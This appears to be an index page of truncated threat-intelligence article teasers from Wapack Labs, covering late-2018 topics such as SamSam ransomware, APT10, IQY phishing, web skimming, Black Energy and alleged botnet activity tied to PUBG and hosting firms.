All Articles (193)

Summary King Servers is a Russian hosting firm whose servers have been involved in numerous Russian criminal and Russian APT activities over the last few years. These activities include the compromise of the Arizona and Illinois SBOE (State Board of Elections) websites in 2016, and the use of King Server IP’s as C2’s for the newest Trickbot module. Wapack Labs also found that in February 2018, King Servers hosted the Emotet malicious email campaign involving denniscrawford2014[.]com. This domain


China’s Tencent Games is the developer of the mobile version of PlayerUnknown’s Battlegrounds, a vastly popular game that Wapack Labs has identified as being used to create botnets for conducting industrial fraud.  This report examines the relationship between Tencent and the Chinese government to explore the question of whether Tencent is a witting participant in this activity or being used by malicious actors in the government.

871403268?profile=RESIZE_710xTencent dominates the Chinese online world.  Tencent’s tex

ProxyLTE, a supplier of US based mobile and home router proxies, has been identified as one component in a large-scale fraud, targeting a Wapack Labs’ client. was created in late 2017, however associated malware was first observed in 2013. This report includes details on ProxyLTE malware and associated infrastructure.

766097321?profile=RESIZE_710xReport Date: January 14, 2019                                                  


Players Unknown Battleground (PUBG) has been identified by Wapack Labs as a large-scale proxy participant in major fraud. It is unclear whether PUBG is a witting or unwitting participant, but it is clear that the PUBG network has been abused for fraudulent purposes.

Wapack Labs has yet to identify the specific malware component that is responsible for recruiting PUBG gamers into various botnets. However, the


Information regarding a group of Chinese APT cyber actors stealing high value information from commercial and governmental victims in the US and abroad was recently collected and analyzed by US federal authorities.  This Chinese APT group is known within private sector reporting as APT10, Cloud Hopper, menuPass, Stone Panda, Red Apollo, CVNX and POTASSIUM.  This group heavily targets managed service providers (MSP) who offer cloud computing services; commercial and governmental clients

2019 Cyber Security Threat and Vulnerability Predictions

This report outlines our predictions regarding cyber threats and vulnerabilities for 2019.  We base those on the trends Wapack Labs were observing during 2018.  The main topics are artificial intelligence, IoT and mobile, cryptocurrency cybercrime, APT activity, and eCommerce targeting.

  1. Smarter Computing: Swarm, AI and Quantum

Quantum Computing

IBM-Q allows access to its quantum computer for research and testing. Quantum computing will revolut


China has long exerted control over Internet content and access by its citizens.  The censorship regime known as the Great Firewall of China has been used to eliminate unwanted content such as criticism of Communist Party leadership.  Since Xi Jinping’s became president in 2013, that regime has been tightening up in many ways. 

China’s right to control its own portion of the Internet has been defended by the government through its promotion of the concept of “cyber sovereignty.”  They e


US federal authorities are assessing cyber criminals are likely using Internet query (IQY) files in their phishing campaign emails targeting US businesses, indicating a new tactic, technique, and procedure (TTP).  IQY files are a specific file format used to import data from external sources such as remote servers into Excel spreadsheets, where it is then executed on the computers. In cybercriminal phishing attempts, a malicious web server URL was put into the IQY file attached to the em


Meng Wanzhou, the Chief Financial Officer of Huawei Technologies, was arrested at the Vancouver Airport on 1 December 2018 at the request of US authorities.  The US seeks her extradition so that she can face charges of US sanction violations in America court.  After being held for ten days, Meng was released on bail and is staying in Vancouver while the extradition request is adjudicated by the Canadian government.

411043467?profile=RESIZE_710xThe Chinese government has reacted strongly to her arrest and has deploye

Below is the Executive Summary regarding the recent email bomb threats sent internationally.  Our good friends from Global Guardian shared their threat assessment for situational awareness.

Summary - On 13 December 2018, hundreds of businesses, law enforcement agencies and public services across the United States and Canada received email threats demanding a bitcoin payment of $20,000 in the early afternoon, prompting evacuations, building sweeps and overloading police call centers. What’s more,


Wapack Labs SOC identified JexBoss exploit attempts against an HVAC Controller, a NetScaler device, and the CEO of the company. This exploit is known to be a delivery mechanism of SamSam ransomware --and it would have been the second time this company would have suffered a large scale ramsomware attack.


Wapack Labs observed multiple attempts to exploit JBoss Application Servers using the JexBoss Exploit Tool staring in November of 2018.  Research into these incidents shows

In a recent blog by Nitzan Daube, CTO of NanoLock¸ he provides an explanation regarding the importance of security focus on both IT hardware, physical security and cyber security consequences.  Wapack Labs agrees whole heartedly, and is providing solutions.

Wapack Labs participated in a recent lecture at the October 2018 ASIS Conference, held in Las Vegas NV.  Our joint lecture specifically addressed hardware compromise, adherence to physical security and the psychology of insider threats.  Rece

The Air Force Institute of Technology[1] (AFIT) has releases free “Blockchain for Supply Chain” tools for supply chain professionals to learn about and use the power of block chain technology.  AFIT recently published a live blockchain application that can be accessed from any computer or smart phone, along with a complementary series of tutorial videos that presents blockchain simulation.  These videos can be used as a stand-alone classroom module, or the video and the blockchain website can be

Cyber security professionals often get focused on dangers which appear inside their networks or within company messages, sometimes overlooking physical threats.  Laptops and devices routinely leave the confines of network cyber security parameters.  In this circumstance, a hacker can easily get physically next to a vulnerable laptop, which may permit firewall rules and DNS Security inoperable to a bad guy hacking into “your” laptop.[1]  This is why Wapack Labs strongly suggest linking physical s

This report is an update to previous Wapack Labs postings regarding the SamSam malware.  US federal authorities are providing current information about the vulnerabilities and exploits used to deploy SamSam ransomware, also known as MSIL/Samas.A.  This malware was being deployed by cyber criminals Mohammad Mehdi Shah Mansouri and Faramarz Shahi Savandi.  On 26 November 2018, the District of New Jersey indicted Mansouri and Savandi for developing and deploying SamSam ransomware.  SamSam infects w


China hosted its World Internet Conference on 7-9 November 2018 in Wuzhen, the fifth conference in this series.  As in past years, the conference was attended by Chinese political and corporate figures as well as representatives from several major Silicon Valley companies.  However, the level of foreign participation was significantly reduced from last year.  Tim Cook of Apple and Sundar Pichai of Google, featured speakers in 2017, skipped the 2018 conference.  Xi Jinping did not partici

US federal authorities have received an increase in complaints over the past three months of credit card information theft by cyber criminals using web injection to introduce skimming code on e-commerce payment card processing web pages.  Cyber criminals introduced skimming code to the payment card processing websites by gaining access to either the victim’s network or a third-party entity.  The code captured credit card data as the end user entered it in real time.  That information was exfiltr

The US, Department of Homeland Security (DHS), Cyber Intelligence Network (CIN) is aware of a Thanksgiving Day-themed phishing email campaign with at least two variants targeting US government entities.  The campaign began on 19 November 2018, and the phishing emails include Thanksgiving Day-themed subject lines with holiday-themed titled documents.  The emails spoof legitimate government senders and attempt to deliver malware to legitimate government entities.  The reported agencies that have b

Wapack Labs has identified 699 unique IP addresses believed to be infected by or associated with, possible delivery of Black Energy.  Some of these connections contained an href user agent (pointing at another location), others appeared infected with Black Energy and were identified checking into our Black Energy sinkholes.  Black Energy, as you may recall, was used against Ukraine on 23 December 2015, in coordinated attacks against multiple regional distribution power companies in Ivano-Fran


On 10 October 2018, the FBI announced the arrest of Xu Yanjun, a Chinese intelligent agent who had been targeting an employee of GE Aviation to acquire trade secrets on the company’s jet engines.  The target employee had cooperated with the FBI during this operation, and when Xu arranged a meeting with the employee in Europe in April 2018, Xu was arrested.  He was extradited from Belgium to the United States in October and charged with economic espionage.133173433?profile=RESIZE_710xDetails in the indictment issued